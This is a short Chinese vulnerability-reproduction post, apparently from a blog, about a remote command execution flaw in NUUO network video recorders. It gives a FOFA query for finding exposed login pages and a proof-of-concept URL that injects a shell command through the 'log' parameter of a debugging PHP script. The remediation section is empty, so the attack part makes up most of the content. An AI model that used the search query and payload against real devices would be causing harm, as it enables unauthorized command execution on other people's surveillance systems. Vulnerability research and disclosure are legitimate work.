【漏洞复现】NUUO摄像头存在远程命令执行漏洞

漏洞描述

NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

复制代码
fofa title="Network Video Recorder Login "

漏洞复现

漏洞链接:http://127.0.0.1/**debugging_center_utils** _.php?log=;id

修复方案

相关推荐
NewCarRen1 小时前
安全碰撞测试:汽车车载IT组件的实际安全评估
网络·网络安全
运筹vivo@2 小时前
攻防世界:get_post
web安全
23zhgjx-hyh2 小时前
【项目四:网络攻击分析】
网络·安全·web安全
汤愈韬2 小时前
防火墙双机热备01(主备模式)
网络·网络协议·网络安全·security·huawei
NewCarRen3 小时前
汽车安全威胁分析与风险评估技术及缓解方法
网络·安全·web安全
Whoami!3 小时前
❿⁄₁₀ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 获取并破解NTLM哈希
网络安全·信息安全·密码破解·mimikatz·ntlm哈希
半路_出家ren3 小时前
20.基于Selenium实现界面自动化控制
运维·python·selenium·测试工具·网络安全·自动化·chromedriver
计算机毕业设计指导3 小时前
恶意网址检测系统
python·web安全·网络安全·系统安全
独立开发者阿乐3 小时前
Vue3中Markdown解析与渲染的完整解决方案:从安全到性能优化
web安全·性能优化·vue3·前端开发·语法高亮·markdown解析·markdown-it
云安全干货局15 小时前
服务器被攻击后如何快速恢复?数据备份 + 应急响应手册
网络·网络安全·云服务器·弹性云服务器